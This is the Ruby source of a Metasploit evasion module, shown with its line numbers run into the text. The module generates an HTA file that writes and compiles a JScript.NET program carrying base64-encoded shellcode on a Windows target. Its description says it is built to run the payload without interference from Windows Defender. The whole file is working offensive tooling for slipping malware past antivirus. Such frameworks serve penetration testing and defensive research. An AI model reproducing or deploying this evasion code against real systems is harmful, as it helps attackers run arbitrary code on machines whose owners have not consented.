Path: blob/master/modules/evasion/windows/windows_defender_js_hta.rb
19515 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Evasion67def initialize(info = {})8super(9merge_info(10info,11'Name' => 'Microsoft Windows Defender Evasive JS.Net and HTA',12'Description' => %q{13This module will generate an HTA file that writes and compiles a JScript.NET file14containing shellcode on the target machine. After compilation, the generated EXE will15execute the shellcode without interference from Windows Defender.1617It is recommended that you use a payload that uses RC4 or HTTPS for best experience.18},19'Author' => [20'sinmygit', # PoC21'Shelby Pace' # Metasploit Module22],23'License' => MSF_LICENSE,24'Platform' => 'win',25'Arch' => ARCH_X64,26'Targets' => [ [ 'Microsoft Windows', {} ] ]27)28)2930register_options([31OptString.new(32'FILENAME',33[34true,35'Filename for the evasive file (default: random)',36"#{Rex::Text.rand_text_alpha(3..10)}.hta"37]38)39])40end4142def run43# This is used in the ERB template44file_payload = Rex::Text.encode_base64(payload.encoded)45evasion_shellcode_path = File.join(Msf::Config.data_directory, 'exploits', 'evasion_shellcode.js')46jsnet_code = File.read(evasion_shellcode_path)47fail_with(Failure::NotFound, 'The JScript.NET file was not found.') unless File.exist?(evasion_shellcode_path)48js_file = ERB.new(jsnet_code).result(binding)49jsnet_encoded = Rex::Text.encode_base64(js_file)50# This is used in the ERB template51fname = Rex::Text.rand_text_alpha(6)52arch = ['x86', 'x64'].include?(payload.arch.first) ? payload.arch.first : 'anycpu'53hta_path = File.join(Msf::Config.data_directory, 'exploits', 'hta_evasion.hta')54hta = File.read(hta_path)55fail_with(Failure::NotFound, 'The HTA file was not found.') unless File.exist?(hta_path)56hta_file = ERB.new(hta).result(binding)57file_create(hta_file)58end59end606162